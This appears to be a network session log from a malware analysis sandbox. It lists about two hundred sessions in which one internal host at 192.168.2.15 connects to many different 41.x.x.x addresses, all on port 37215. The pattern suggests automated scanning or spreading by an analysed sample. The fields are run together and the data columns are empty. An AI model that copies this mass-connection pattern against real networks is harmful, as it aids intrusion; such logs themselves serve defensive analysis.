                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9716192.168.2.154983641.234.78.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9717192.168.2.154836841.101.218.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9718192.168.2.154507641.136.195.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9719192.168.2.155473241.45.81.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9720192.168.2.155281041.245.22.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9721192.168.2.154382841.222.44.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9722192.168.2.154372241.88.106.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9723192.168.2.153749041.114.204.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9724192.168.2.154030841.175.18.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9725192.168.2.154052841.190.84.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9726192.168.2.155062441.22.196.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9727192.168.2.155693841.172.62.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9728192.168.2.155008041.216.106.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9729192.168.2.155807041.243.180.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9730192.168.2.155014641.20.8.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9731192.168.2.155022441.174.214.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9732192.168.2.154860041.48.174.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9733192.168.2.154852841.250.140.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9734192.168.2.154357241.212.67.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9735192.168.2.154613841.227.216.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9736192.168.2.153943441.216.192.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9737192.168.2.155759641.4.170.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9738192.168.2.153791041.84.86.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9739192.168.2.155247241.198.173.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9740192.168.2.153754441.14.117.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9741192.168.2.154484641.202.210.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9742192.168.2.153503041.41.87.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9743192.168.2.154198841.7.137.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9744192.168.2.155282641.60.15.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9745192.168.2.154560041.193.112.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9746192.168.2.155479641.194.58.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9747192.168.2.153318641.49.53.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9748192.168.2.155724241.123.27.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9749192.168.2.153686241.57.165.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9750192.168.2.154924441.70.202.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9751192.168.2.153478641.166.27.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9752192.168.2.155176841.255.17.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9753192.168.2.154731041.126.73.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9754192.168.2.154150441.219.251.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9755192.168.2.155690841.9.46.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9756192.168.2.153790841.21.10.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9757192.168.2.154432241.15.205.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9758192.168.2.155561641.182.86.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9759192.168.2.154525841.173.55.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9760192.168.2.155917641.207.69.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9761192.168.2.155554441.247.135.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9762192.168.2.154060841.132.58.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9763192.168.2.153979441.182.36.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9764192.168.2.154986641.122.214.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9765192.168.2.154046441.86.118.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9766192.168.2.154459041.45.49.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9767192.168.2.155570841.185.104.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9768192.168.2.156023241.163.78.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9769192.168.2.155812241.227.180.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9770192.168.2.154118841.34.102.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9771192.168.2.155726641.209.24.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9772192.168.2.153377241.162.199.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9773192.168.2.155740641.85.173.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9774192.168.2.154845841.160.22.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9775192.168.2.155040841.139.53.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9776192.168.2.153530241.169.209.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9777192.168.2.154964041.47.234.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9778192.168.2.155301641.148.83.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9779192.168.2.155749841.203.201.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9780192.168.2.153619441.72.108.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9781192.168.2.155993841.167.116.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9782192.168.2.155110241.172.169.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9783192.168.2.155229041.239.11.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9784192.168.2.153989641.205.124.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9785192.168.2.154753241.225.191.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9786192.168.2.155057841.186.230.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9787192.168.2.154291441.206.26.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9788192.168.2.155361641.144.243.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9789192.168.2.155170041.105.71.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9790192.168.2.154800241.118.29.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9791192.168.2.154699641.253.59.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9792192.168.2.155540841.156.147.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9793192.168.2.153971441.137.105.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9794192.168.2.155739441.175.252.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9795192.168.2.154512041.147.174.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9796192.168.2.153336641.87.123.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9797192.168.2.153606241.93.44.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9798192.168.2.154290641.59.242.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9799192.168.2.155046041.204.146.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9800192.168.2.155085041.138.111.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9801192.168.2.154514241.108.67.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9802192.168.2.153586041.246.197.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9803192.168.2.154642641.181.249.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9804192.168.2.156097041.189.168.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9805192.168.2.153739041.187.4.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9806192.168.2.155553041.77.125.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9807192.168.2.155804441.74.119.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9808192.168.2.154146441.97.222.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9809192.168.2.155120041.168.20.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9810192.168.2.154443441.31.7.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9811192.168.2.153342841.70.48.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9812192.168.2.153925641.206.50.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9813192.168.2.153501641.147.99.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9814192.168.2.153753041.144.134.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9815192.168.2.153567241.21.158.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9816192.168.2.155685641.227.47.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9817192.168.2.155041641.161.233.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9818192.168.2.155987441.148.90.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9819192.168.2.154753641.1.161.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9820192.168.2.154250441.56.2.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9821192.168.2.153861641.140.43.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9822192.168.2.155529041.201.114.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9823192.168.2.153774641.204.93.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9824192.168.2.155019841.166.221.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9825192.168.2.154316641.71.73.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9826192.168.2.153398041.188.170.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9827192.168.2.153456241.126.130.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9828192.168.2.156089441.120.61.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9829192.168.2.155986641.217.12.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9830192.168.2.155457641.160.199.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9831192.168.2.154242241.107.228.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9832192.168.2.154594841.245.2.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9833192.168.2.153721641.22.56.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9834192.168.2.154639641.159.138.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9835192.168.2.155973841.115.188.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9836192.168.2.156052041.114.206.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9837192.168.2.153899041.229.100.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9838192.168.2.153495241.104.255.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9839192.168.2.155253841.187.245.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9840192.168.2.153734641.143.70.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9841192.168.2.155714041.209.102.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9842192.168.2.153873241.51.245.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9843192.168.2.153896041.147.222.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9844192.168.2.155786241.155.126.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9845192.168.2.154390041.58.212.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9846192.168.2.155401641.195.184.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9847192.168.2.153417841.139.122.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9848192.168.2.154786641.155.2.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9849192.168.2.153486841.55.54.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9850192.168.2.155192641.186.100.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9851192.168.2.155004241.255.10.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9852192.168.2.153410841.61.126.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9853192.168.2.155430441.211.58.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9854192.168.2.154181841.129.119.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9855192.168.2.155076641.112.115.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9856192.168.2.155251041.194.112.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9857192.168.2.154518241.81.40.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9858192.168.2.155999841.59.222.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9859192.168.2.153402241.130.153.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9860192.168.2.154728641.136.197.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9861192.168.2.153939841.151.129.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9862192.168.2.154081041.124.64.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9863192.168.2.155101641.160.205.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9864192.168.2.154623041.240.175.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9865192.168.2.155766041.86.37.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9866192.168.2.154331041.156.108.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9867192.168.2.153339841.201.147.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9868192.168.2.155348041.213.179.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9869192.168.2.154557241.135.81.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9870192.168.2.156093841.170.50.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9871192.168.2.154687041.72.117.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9872192.168.2.153326041.181.137.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9873192.168.2.153833241.140.237.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9874192.168.2.153971041.179.52.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9875192.168.2.154526841.97.248.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9876192.168.2.155494041.204.44.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9877192.168.2.154795641.190.110.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9878192.168.2.155016041.144.36.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9879192.168.2.154488241.168.228.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9880192.168.2.153663441.174.203.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9881192.168.2.154490641.176.83.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9882192.168.2.153948441.131.192.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9883192.168.2.154555441.240.56.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9884192.168.2.153461041.208.42.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9885192.168.2.154260441.175.207.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9886192.168.2.154798041.203.55.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9887192.168.2.153470441.185.224.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9888192.168.2.154388241.106.68.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9889192.168.2.155841641.219.102.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9890192.168.2.154127041.14.134.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9891192.168.2.155602241.34.100.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9892192.168.2.153541241.161.8.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9893192.168.2.153343641.131.134.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9894192.168.2.153981241.45.78.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9895192.168.2.154013041.16.243.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9896192.168.2.155338241.236.222.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9897192.168.2.155906841.78.122.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9898192.168.2.155065441.251.45.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9899192.168.2.155306441.181.41.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9900192.168.2.153300841.30.163.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9901192.168.2.154683841.176.163.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9902192.168.2.155156641.113.112.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9903192.168.2.154162841.58.163.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9904192.168.2.153635041.238.63.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9905192.168.2.153593841.6.113.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9906192.168.2.156075441.88.47.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9907192.168.2.154155641.113.142.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9908192.168.2.153754841.42.205.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9909192.168.2.156033441.46.77.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9910192.168.2.153755441.216.104.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9911192.168.2.153881841.54.20.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9912192.168.2.153522641.95.71.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9913192.168.2.153934641.247.187.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9914192.168.2.154066641.152.155.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9915192.168.2.154996641.222.140.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9916192.168.2.153786041.168.124.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9917192.168.2.153626641.208.4.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
